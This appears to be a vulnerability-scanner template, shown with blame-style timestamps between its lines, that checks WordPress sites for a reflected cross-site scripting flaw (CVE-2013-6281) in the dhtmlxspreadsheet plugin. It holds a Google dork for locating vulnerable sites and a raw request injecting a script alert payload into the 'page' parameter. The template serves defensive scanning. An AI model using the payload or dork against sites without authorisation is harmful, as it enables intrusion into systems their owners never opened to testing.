2022-05-19 18:27:03 +00:00
id : CVE-2013-6281
info :
name : WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS
author : random-robbie
severity : medium
2022-05-19 18:34:24 +00:00
description : |
The dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability.
2022-05-19 18:27:03 +00:00
reference :
2022-05-19 18:34:24 +00:00
- https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf
2022-05-19 18:27:03 +00:00
- https://www.securityfocus.com/bid/63256/
2022-05-19 18:34:24 +00:00
- https://wordpress.org/plugins/dhtmlxspreadsheet/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281
2022-05-19 18:27:03 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2013-6281
cwe-id : CWE-79
2022-05-19 18:34:24 +00:00
metadata :
2022-05-19 18:52:30 +00:00
google-dork : inurl:/wp-content/plugins/dhtmlxspreadsheet
2022-05-19 18:46:59 +00:00
verified : "true"
2022-05-19 18:34:24 +00:00
tags : cve,cve2013,wordpress,xss,wp-plugin,wp
2022-05-19 18:27:03 +00:00
requests :
- raw :
- |
2022-05-19 18:34:24 +00:00
GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
2022-05-19 18:27:03 +00:00
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-05-19 18:34:24 +00:00
- "page: '<script>alert(document.domain)</script>'"
2022-05-19 18:27:03 +00:00
- "dhx_rel_path"
2022-05-19 18:34:24 +00:00
condition : and
2022-05-19 18:27:03 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200